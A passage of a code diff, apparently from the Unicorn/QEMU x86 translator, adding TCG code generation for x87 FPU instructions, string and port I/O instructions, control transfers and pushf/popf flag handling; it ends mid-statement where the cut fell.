tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + gen_helper_fldl_FT0(tcg_ctx, cpu_env, cpu_tmp1_i64); + break; + case 3: + default: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LESW); + gen_helper_fildl_FT0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + } + + gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); + if (op1 == 3) { + /* fcomp needs pop */ + gen_helper_fpop(tcg_ctx, cpu_env); + } + fpu_update_ip(env, pc_start); + } + else if((op == 0x08) || /* flds */ + (op == 0x0a) || /* fsts */ + (op == 0x0b) || /* fstps */ + (op >= 0x18 && op <= 0x1b) || /* fildl, fisttpl, fistl, fistpl */ + (op >= 0x28 && op <= 0x2b) || /* fldl, fisttpll, fstl, fstpl */ + (op >= 0x38 && op <= 
0x3b) ) /* filds, fisttps, fists, fistps */ + { + switch(op & 7) { + case 0: + switch(op >> 4) { + case 0: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_flds_ST0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 1: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_fildl_ST0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 2: + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + gen_helper_fldl_ST0(tcg_ctx, cpu_env, cpu_tmp1_i64); + break; + case 3: + default: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LESW); + gen_helper_fildl_ST0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + } + break; + case 1: + /* XXX: the corresponding CPUID bit must be tested ! */ + switch(op >> 4) { + case 1: + gen_helper_fisttl_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + break; + case 2: + gen_helper_fisttll_ST0(tcg_ctx, cpu_tmp1_i64, cpu_env); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + break; + case 3: + default: + gen_helper_fistt_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + break; + } + gen_helper_fpop(tcg_ctx, cpu_env); + break; + default: + switch(op >> 4) { + case 0: + gen_helper_fsts_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + break; + case 1: + gen_helper_fistl_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + break; + case 2: + gen_helper_fstl_ST0(tcg_ctx, cpu_tmp1_i64, cpu_env); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + break; + case 3: + default: + gen_helper_fist_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + break; + } + if ((op & 7) 
== 3) + gen_helper_fpop(tcg_ctx, cpu_env); + break; + } + fpu_update_ip(env, pc_start); + } + else if(op == 0x0c) /* fldenv mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fldenv(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x0d) /* fldcw mem */ + { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + gen_helper_fldcw(tcg_ctx, cpu_env, cpu_tmp2_i32); + } + else if(op == 0x0e) /* fnstenv mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fstenv(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x0f) /* fnstcw mem */ + { + gen_helper_fnstcw(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + } + else if(op == 0x1d) /* fldt mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fldt_ST0(tcg_ctx, cpu_env, cpu_A0); + fpu_update_ip(env, pc_start); + } + else if(op == 0x1f) /* fstpt mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fstt_ST0(tcg_ctx, cpu_env, cpu_A0); + gen_helper_fpop(tcg_ctx, cpu_env); + fpu_update_ip(env, pc_start); + } + else if(op == 0x2c) /* frstor mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_frstor(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x2e) /* fnsave mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fsave(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x2f) /* fnstsw mem */ + { + gen_helper_fnstsw(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + } + else if(op == 0x3c) /* fbld */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fbld_ST0(tcg_ctx, cpu_env, cpu_A0); + fpu_update_ip(env, pc_start); + } + else 
if(op == 0x3e) /* fbstp */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fbst_ST0(tcg_ctx, cpu_env, cpu_A0); + gen_helper_fpop(tcg_ctx, cpu_env); + fpu_update_ip(env, pc_start); + } + else if(op == 0x3d) /* fildll */ + { + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); + gen_helper_fildll_ST0(tcg_ctx, cpu_env, cpu_tmp1_i64); + fpu_update_ip(env, pc_start); + } + else if(op == 0x3f) /* fistpll */ + { + gen_helper_fistll_ST0(tcg_ctx, cpu_tmp1_i64, cpu_env); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); + gen_helper_fpop(tcg_ctx, cpu_env); + fpu_update_ip(env, pc_start); + } + else + { + goto illegal_op; + } + } else { + /* register float ops */ + opreg = rm; + + switch(op) { + case 0x08: /* fld sti */ + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fmov_ST0_STN(tcg_ctx, cpu_env, + tcg_const_i32(tcg_ctx, (opreg + 1) & 7)); + break; + case 0x09: /* fxchg sti */ + case 0x29: /* fxchg4 sti, undocumented op */ + case 0x39: /* fxchg7 sti, undocumented op */ + gen_helper_fxchg_ST0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + break; + case 0x0a: /* grp d9/2 */ + switch(rm) { + case 0: /* fnop */ + /* check exceptions (FreeBSD FPU probe) */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fwait(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x0c: /* grp d9/4 */ + switch(rm) { + case 0: /* fchs */ + gen_helper_fchs_ST0(tcg_ctx, cpu_env); + break; + case 1: /* fabs */ + gen_helper_fabs_ST0(tcg_ctx, cpu_env); + break; + case 4: /* ftst */ + gen_helper_fldz_FT0(tcg_ctx, cpu_env); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + break; + case 5: /* fxam */ + gen_helper_fxam_ST0(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x0d: /* grp d9/5 */ + { + switch(rm) { + case 0: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fld1_ST0(tcg_ctx, cpu_env); + break; + case 1: + gen_helper_fpush(tcg_ctx, 
cpu_env); + gen_helper_fldl2t_ST0(tcg_ctx, cpu_env); + break; + case 2: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldl2e_ST0(tcg_ctx, cpu_env); + break; + case 3: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldpi_ST0(tcg_ctx, cpu_env); + break; + case 4: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldlg2_ST0(tcg_ctx, cpu_env); + break; + case 5: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldln2_ST0(tcg_ctx, cpu_env); + break; + case 6: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldz_ST0(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + } + break; + case 0x0e: /* grp d9/6 */ + switch(rm) { + case 0: /* f2xm1 */ + gen_helper_f2xm1(tcg_ctx, cpu_env); + break; + case 1: /* fyl2x */ + gen_helper_fyl2x(tcg_ctx, cpu_env); + break; + case 2: /* fptan */ + gen_helper_fptan(tcg_ctx, cpu_env); + break; + case 3: /* fpatan */ + gen_helper_fpatan(tcg_ctx, cpu_env); + break; + case 4: /* fxtract */ + gen_helper_fxtract(tcg_ctx, cpu_env); + break; + case 5: /* fprem1 */ + gen_helper_fprem1(tcg_ctx, cpu_env); + break; + case 6: /* fdecstp */ + gen_helper_fdecstp(tcg_ctx, cpu_env); + break; + default: + case 7: /* fincstp */ + gen_helper_fincstp(tcg_ctx, cpu_env); + break; + } + break; + case 0x0f: /* grp d9/7 */ + switch(rm) { + case 0: /* fprem */ + gen_helper_fprem(tcg_ctx, cpu_env); + break; + case 1: /* fyl2xp1 */ + gen_helper_fyl2xp1(tcg_ctx, cpu_env); + break; + case 2: /* fsqrt */ + gen_helper_fsqrt(tcg_ctx, cpu_env); + break; + case 3: /* fsincos */ + gen_helper_fsincos(tcg_ctx, cpu_env); + break; + case 5: /* fscale */ + gen_helper_fscale(tcg_ctx, cpu_env); + break; + case 4: /* frndint */ + gen_helper_frndint(tcg_ctx, cpu_env); + break; + case 6: /* fsin */ + gen_helper_fsin(tcg_ctx, cpu_env); + break; + default: + case 7: /* fcos */ + gen_helper_fcos(tcg_ctx, cpu_env); + break; + } + break; + case 0x00: case 0x01: case 0x04: case 0x05: case 0x06: case 0x07: /* fxxx st, sti */ + case 0x20: case 0x21: case 0x24: case 
0x25: case 0x26: case 0x27: /* fxxx sti, st */ + case 0x30: case 0x31: case 0x34: case 0x35: case 0x36: case 0x37: /* fxxxp sti, st */ + { + int op1; + + op1 = op & 7; + if (op >= 0x20) { + gen_helper_fp_arith_STN_ST0(tcg_ctx, op1, opreg); + if (op >= 0x30) + gen_helper_fpop(tcg_ctx, cpu_env); + } else { + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); + } + } + break; + case 0x02: /* fcom */ + case 0x22: /* fcom2, undocumented op */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + break; + case 0x03: /* fcomp */ + case 0x23: /* fcomp3, undocumented op */ + case 0x32: /* fcomp5, undocumented op */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x15: /* da/5 */ + switch(rm) { + case 1: /* fucompp */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, 1)); + gen_helper_fucom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x1c: + switch(rm) { + case 0: /* feni (287 only, just do nop here) */ + break; + case 1: /* fdisi (287 only, just do nop here) */ + break; + case 2: /* fclex */ + gen_helper_fclex(tcg_ctx, cpu_env); + break; + case 3: /* fninit */ + gen_helper_fninit(tcg_ctx, cpu_env); + break; + case 4: /* fsetpm (287 only, just do nop here) */ + break; + default: + goto illegal_op; + } + break; + case 0x1d: /* fucomi */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucomi_ST0_FT0(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x1e: /* fcomi */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + 
gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcomi_ST0_FT0(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x28: /* ffree sti */ + gen_helper_ffree_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + break; + case 0x2a: /* fst sti */ + gen_helper_fmov_STN_ST0(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + break; + case 0x2b: /* fstp sti */ + case 0x0b: /* fstp1 sti, undocumented op */ + case 0x3a: /* fstp8 sti, undocumented op */ + case 0x3b: /* fstp9 sti, undocumented op */ + gen_helper_fmov_STN_ST0(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x2c: /* fucom st(i) */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucom_ST0_FT0(tcg_ctx, cpu_env); + break; + case 0x2d: /* fucomp st(i) */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x33: /* de/3 */ + switch(rm) { + case 1: /* fcompp */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, 1)); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x38: /* ffreep sti, undocumented op */ + gen_helper_ffree_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x3c: /* df/4 */ + switch(rm) { + case 0: + gen_helper_fnstsw(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + break; + default: + goto illegal_op; + } + break; + case 0x3d: /* fucomip */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + 
gen_helper_fucomi_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x3e: /* fcomip */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcomi_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x10: case 0x11: case 0x12: case 0x13: /* fcmovxx */ + case 0x18: case 0x19: case 0x1a: case 0x1b: + { + int op1, l1; + static const uint8_t fcmov_cc[8] = { + (JCC_B << 1), + (JCC_Z << 1), + (JCC_BE << 1), + (JCC_P << 1), + }; + + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + op1 = fcmov_cc[op & 3] | (((op >> 3) & 1) ^ 1); + l1 = gen_new_label(tcg_ctx); + gen_jcc1_noeob(s, op1, l1); + gen_helper_fmov_ST0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_set_label(tcg_ctx, l1); + } + break; + default: + goto illegal_op; + } + fpu_update_ip(env, pc_start); + } + break; + /************************/ + /* string ops */ + + case 0xa4: /* movsS */ + case 0xa5: + ot = mo_b_d(b, dflag); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_movs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_movs(s, ot); + } + break; + + case 0xaa: /* stosS */ + case 0xab: + ot = mo_b_d(b, dflag); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_stos(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_stos(s, ot); + } + break; + case 0xac: /* lodsS */ + case 0xad: + ot = mo_b_d(b, dflag); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_lods(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_lods(s, ot); + } + break; + case 0xae: /* scasS */ + case 0xaf: + ot = mo_b_d(b, dflag); + if (prefixes & PREFIX_REPNZ) { + gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); + } else if (prefixes & PREFIX_REPZ) { + gen_repz_scas(s, ot, pc_start 
- s->cs_base, s->pc - s->cs_base, 0); + } else { + gen_scas(s, ot); + } + break; + + case 0xa6: /* cmpsS */ + case 0xa7: + ot = mo_b_d(b, dflag); + if (prefixes & PREFIX_REPNZ) { + gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); + } else if (prefixes & PREFIX_REPZ) { + gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); + } else { + gen_cmps(s, ot); + } + break; + case 0x6c: /* insS */ // qq + case 0x6d: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes) | 4); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_ins(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_ins(s, ot); + } + break; + case 0x6e: /* outsS */ // qq + case 0x6f: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + svm_is_rep(prefixes) | 4); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_outs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_outs(s, ot); + } + break; + + /************************/ + /* port I/O */ + + case 0xe4: // in + case 0xe5: // out + ot = mo_b_d32(b, dflag); + val = cpu_ldub_code(env, s->pc++); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_check_io(s, ot, pc_start - s->cs_base, + SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, val); + gen_helper_in_func(tcg_ctx, ot, *cpu_T[1], cpu_tmp2_i32); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[1]); + break; + case 0xe6: + case 0xe7: + ot = mo_b_d32(b, dflag); + val = cpu_ldub_code(env, s->pc++); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_check_io(s, ot, pc_start - s->cs_base, + svm_is_rep(prefixes)); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], R_EAX); + + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, val); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + gen_helper_out_func(tcg_ctx, ot, 
cpu_tmp2_i32, cpu_tmp3_i32); + break; + case 0xec: + case 0xed: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_in_func(tcg_ctx, ot, *cpu_T[1], cpu_tmp2_i32); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[1]); + break; + case 0xee: + case 0xef: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + svm_is_rep(prefixes)); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], R_EAX); + + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + gen_helper_out_func(tcg_ctx, ot, cpu_tmp2_i32, cpu_tmp3_i32); + break; + + /************************/ + /* control */ + case 0xc2: /* ret im */ + val = cpu_ldsw_code(env, s->pc); + s->pc += 2; + ot = gen_pop_T0(s); + gen_stack_update(s, val + (1 << ot)); + /* Note that gen_pop_T0 uses a zero-extending load. */ + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 0xc3: /* ret */ + ot = gen_pop_T0(s); + gen_pop_update(s, ot); + /* Note that gen_pop_T0 uses a zero-extending load. 
*/ + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 0xca: /* lret im */ + val = cpu_ldsw_code(env, s->pc); + s->pc += 2; + do_lret: + if (s->pe && !s->vm86) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_lret_protected(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, val)); + } else { + gen_stack_A0(s); + /* pop offset */ + gen_op_ld_v(s, dflag, *cpu_T[0], cpu_A0); + /* NOTE: keeping EIP updated is not a problem in case of + exception */ + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + /* pop selector */ + gen_op_addl_A0_im(tcg_ctx, 1 << dflag); + gen_op_ld_v(s, dflag, *cpu_T[0], cpu_A0); + gen_op_movl_seg_T0_vm(tcg_ctx, R_CS); + /* add stack offset */ + gen_stack_update(s, val + (2 << dflag)); + } + gen_eob(s); + break; + case 0xcb: /* lret */ + val = 0; + goto do_lret; + case 0xcf: /* iret */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_IRET); + if (!s->pe) { + /* real mode */ + gen_helper_iret_real(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + set_cc_op(s, CC_OP_EFLAGS); + } else if (s->vm86) { + if (s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_helper_iret_real(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + set_cc_op(s, CC_OP_EFLAGS); + } + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_iret_protected(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); + set_cc_op(s, CC_OP_EFLAGS); + } + gen_eob(s); + break; + case 0xe8: /* call im */ + { + if (dflag != MO_16) { + tval = (int32_t)insn_get(env, s, MO_32); + } else { + tval = (int16_t)insn_get(env, s, MO_16); + } + next_eip = s->pc - s->cs_base; + tval += next_eip; + if (dflag == MO_16) { + tval &= 0xffff; + } else if (!CODE64(s)) { + tval &= 0xffffffff; + } + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], next_eip); + gen_push_v(s, *cpu_T[0]); + gen_jmp(s, tval); + } + break; + case 0x9a: /* lcall im */ + { + 
unsigned int selector, offset; + + if (CODE64(s)) + goto illegal_op; + ot = dflag; + offset = insn_get(env, s, ot); + selector = insn_get(env, s, MO_16); + + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], selector); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], offset); + } + goto do_lcall; + case 0xe9: /* jmp im */ + if (dflag != MO_16) { + tval = (int32_t)insn_get(env, s, MO_32); + } else { + tval = (int16_t)insn_get(env, s, MO_16); + } + tval += s->pc - s->cs_base; + if (dflag == MO_16) { + tval &= 0xffff; + } else if (!CODE64(s)) { + tval &= 0xffffffff; + } + gen_jmp(s, tval); + break; + case 0xea: /* ljmp im */ + { + unsigned int selector, offset; + + if (CODE64(s)) + goto illegal_op; + ot = dflag; + offset = insn_get(env, s, ot); + selector = insn_get(env, s, MO_16); + + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], selector); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], offset); + } + goto do_ljmp; + case 0xeb: /* jmp Jb */ + tval = (int8_t)insn_get(env, s, MO_8); + tval += s->pc - s->cs_base; + if (dflag == MO_16) { + tval &= 0xffff; + } + gen_jmp(s, tval); + break; + //case 0x70 ... 0x7f: /* jcc Jb */ + case 0x70: case 0x71: case 0x72: case 0x73: case 0x74: case 0x75: case 0x76: case 0x77: + case 0x78: case 0x79: case 0x7a: case 0x7b: case 0x7c: case 0x7d: case 0x7e: case 0x7f: + tval = (int8_t)insn_get(env, s, MO_8); + goto do_jcc; + //case 0x180 ... 0x18f: /* jcc Jv */ + case 0x180: case 0x181: case 0x182: case 0x183: case 0x184: case 0x185: case 0x186: case 0x187: + case 0x188: case 0x189: case 0x18a: case 0x18b: case 0x18c: case 0x18d: case 0x18e: case 0x18f: + if (dflag != MO_16) { + tval = (int32_t)insn_get(env, s, MO_32); + } else { + tval = (int16_t)insn_get(env, s, MO_16); + } + do_jcc: + next_eip = s->pc - s->cs_base; + tval += next_eip; + if (dflag == MO_16) { + tval &= 0xffff; + } + gen_jcc(s, b, tval, next_eip); + break; + + //case 0x190 ... 
0x19f: /* setcc Gv */ + case 0x190: case 0x191: case 0x192: case 0x193: case 0x194: case 0x195: case 0x196: case 0x197: + case 0x198: case 0x199: case 0x19a: case 0x19b: case 0x19c: case 0x19d: case 0x19e: case 0x19f: + modrm = cpu_ldub_code(env, s->pc++); + gen_setcc1(s, b, *cpu_T[0]); + gen_ldst_modrm(env, s, modrm, MO_8, OR_TMP0, 1); + break; + //case 0x140 ... 0x14f: /* cmov Gv, Ev */ + case 0x140: case 0x141: case 0x142: case 0x143: case 0x144: case 0x145: case 0x146: case 0x147: + case 0x148: case 0x149: case 0x14a: case 0x14b: case 0x14c: case 0x14d: case 0x14e: case 0x14f: + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + gen_cmovcc1(env, s, ot, b, modrm, reg); + break; + + /************************/ + /* flags */ + case 0x9c: /* pushf */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_PUSHF); + if (s->vm86 && s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_helper_read_eflags(tcg_ctx, *cpu_T[0], cpu_env); + gen_push_v(s, *cpu_T[0]); + } + break; + case 0x9d: /* popf */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_POPF); + if (s->vm86 && s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + ot = gen_pop_T0(s); + if (s->cpl == 0) { + if (dflag != MO_16) { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK | + IF_MASK | + IOPL_MASK))); + } else { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK | + IF_MASK | IOPL_MASK) + & 0xffff)); + } + } else { + if (s->cpl <= s->iopl) { + if (dflag != MO_16) { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | + AC_MASK | + ID_MASK | + NT_MASK | + IF_MASK))); + } else { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + 
